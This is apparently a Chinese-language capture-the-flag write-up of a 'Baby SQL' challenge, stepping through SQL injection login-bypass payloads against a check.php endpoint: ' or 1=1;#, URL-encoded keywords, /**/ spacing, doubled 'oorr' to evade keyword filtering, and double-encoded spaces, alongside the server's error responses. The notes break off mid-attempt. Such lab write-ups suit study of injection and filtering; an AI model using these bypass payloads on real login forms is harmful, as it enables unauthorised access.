0x01 Subject
Baby SQL
=> 注入漏洞
0x02 Mind Palace
这里的提示是 => 做了严格的过滤 => 关键在绕过(maybe)
/check.php?username=xxx&password=xxx
select x,x from table where username = xxx and password = xxx
payload = /check.php?username=root%27+or+1%3D1%3B%23&password=root
但是感觉上是注释符被过滤了或者and or被过滤了
=> root%27+or+1%3D1%3B%23
| root’ or 1=1;#
假设是or被过滤了,用url编码一下试试%6f%72
=> root%27+%6f%72+1%3D1%3B%23
| root’ or 1=1;#
反馈:1=1;#’ 附近有语法错误
那可能是;
or #
被过滤?
=> root%27/**/%6f%72/**/1%3D1%3B%23
=> root%27/**/oorr/**/1%3D1%3B%23
=> root%27%2520oorr%25201%3D1%3B%23
| root’%20oorr%201=1;#
反馈:Unknown column ‘20or’ in ‘where clause’
好像发现了什么不得了的东西 emm
过滤是肯定有过滤的 ;; oorr的绕过好像是没问题的
因为上面是在抓包的情况下改的 我们直接试试去登陆界面输入
root = root' oorr 1=1;#